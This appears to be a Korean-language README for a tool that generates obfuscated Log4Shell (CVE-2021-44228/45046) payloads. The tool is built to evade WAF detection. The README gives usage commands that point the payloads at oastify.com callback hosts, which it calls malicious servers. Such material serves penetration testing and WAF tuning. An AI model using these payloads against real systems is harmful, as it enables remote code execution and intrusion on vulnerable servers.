
WAF 탐지를 회피하기 위해 CVE-2021-44228 또는 CVE-2021-45046에 대한 1차 난독화된 또는 2차 난독화된 페이로드를 생성합니다.
Log4Shell-obfuscated-payloads-generator는 WAF 탐지를 우회하기 위해 1차 난독화 또는 2차 난독화된 CVE-2021-44228 또는 CVE-2021-45046 페이로드를 생성할 수 있습니다.
Log4Shell-obfuscated-payloads-generator의 설계 아이디어
git clone https://github.com/r3kind1e/Log4Shell-obfuscated-payloads-generator.git
Log4Shell-obfuscated-payloads-generator는 모든 플랫폼에서 Python 3.x와 함께 즉시 작동합니다.
기본 옵션 목록을 보려면 다음을 사용하세요:
python3 Log4Shell-obfuscated-payloads-generator.py -h
사용 예제를 보려면 다음을 사용하세요:
python3 Log4Shell-obfuscated-payloads-generator.py -hh
-h: 기본 옵션 목록 가져오기

-hh: 사용 예제 가져오기

단일 옵션으로 페이로드를 생성할 때 -s 옵션은 악성 서버를 지정합니다:
--generate-primary-obfuscated-cve-2021-44228-payload 8 -s ck0pf4l6fmq4w0v17o7t894txk3arz.oastify.com

--generate-primary-obfuscated-cve-2021-45046-payload 4 -s x53a0p6r07bphlgms9setupei5owcl.oastify.com

--generate-secondary-obfuscated-cve-2021-44228-payload 5 -s oia1rpap41mhxkp6rdbbywit1k7avz.oastify.com

--generate-secondary-obfuscated-cve-2021-45046-payload 5 -s 3vzg44n4hgzwaz2l4soqbbv8ezkq8f.oastify.com

여러 옵션으로 페이로드를 생성할 때 -s 옵션은 악성 서버를 지정합니다:
--generate-primary-obfuscated-cve-2021-44228-payload 4 --generate-secondary-obfuscated-cve-2021-44228-payload 4 -s exfr6fpfjr17ca4w63q1dmxjgam2ar.oastify.com

-s 옵션으로 악성 서버를 지정하지 않으면 생성된 페이로드에서 {{callback_host}} 플레이스홀더가 유지됩니다:
--generate-primary-obfuscated-cve-2021-44228-payload 3

--generate-primary-obfuscated-cve-2021-45046-payload 3 --generate-secondary-obfuscated-cve-2021-45046-payload 7
